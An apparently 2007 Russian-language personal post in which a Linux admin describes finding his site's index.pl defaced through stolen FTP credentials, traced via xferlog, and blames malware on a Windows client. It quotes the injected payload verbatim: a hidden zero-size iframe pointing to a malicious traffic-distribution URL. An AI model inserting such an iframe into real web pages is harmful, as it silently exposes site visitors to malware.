небольшая история про самую большую дырку в безопасности серверов на линуксе

несколько месяцев назад построил я людям сервачек, многого от него не требовалось - сайтик чтобы на нем вертелся да и все, ну потом они заххотели в инет через него ходить и еще всякой мелочевки на нем - ну и попутно десктоп для двух человек на нем же (весьма приятно видеть как сразу двое сидят в kde, тамже кучу рамы сожрал апач с мускулом, при этом своп не тронутый и все это на 512 метрах рамы :))

сайтик изнутри писан мною, управляется он как правило по фтп (хотя за какимто хреном пару админских скриптов нарисовать пришлось - но кто бы их пользовал)

и вот на днях звонок - лежит сцайт
лезу туда и наблюдаю 500
ну практически сразу замечаю что последним правлен был index.pl, смотрю в него и наблюдаю

<!-- ~ --><iframe src="http://keywordsstat.ru/tds/iframe.php?u=new2" width=0 height=0 border=0></iframe>
<!-- ~ -->#!/usr/bin/perl
use www;www::ok;

слегка прихожу в ужос - ибо взлом, и взлом явно через какуюто стандартную дырку какимто ботом - в моих скриптах "стандартного" мало - только выхлоп
разглядываю права на все это вокруг - все нормально - писать может юзер под которым вертится suexec (следовательно даже через phpmyadmin туда ничего не напишешь) ну и root, смотрю в лог апача в районе времени правки файла - тишина - до этого какотйо поисковик индекс пощупал и получил 200, после этого другой получил уже 500
в ужосе думаю - неужто рута поимели..., лезу в secure - даже брутили последний раз весьма давно - все успешные заходы - мои, да и опятьже пароли далеко не словарные
тутже рядом замечаю xferlog (я про наличие там фтп както вообще забыл давно - ssh наше все) и в конце него наблюдаю то что и искал

Sun Jun 17 08:58:44 2007 1 85.17.112.1 37 ///index.pl a _ o r **** ftp 0 * c
Sun Jun 17 08:58:44 2007 1 85.17.112.1 154 ///index.pl a _ i r **** ftp 0 * c

и все становится предельно ясно
вирем, с какойто виндовой тачки, из тех кто там по фтп роется были стырины пароли от всего подряд и собственно вот

ну и на следующий день наблюдаю в вот это: http://thg.ru/technews/20070621_114144.html
тем самым или подобным был угнан пароль - не знаю
знаю лишь то - самая большая дыра в линухе - это маздайцы и их маздай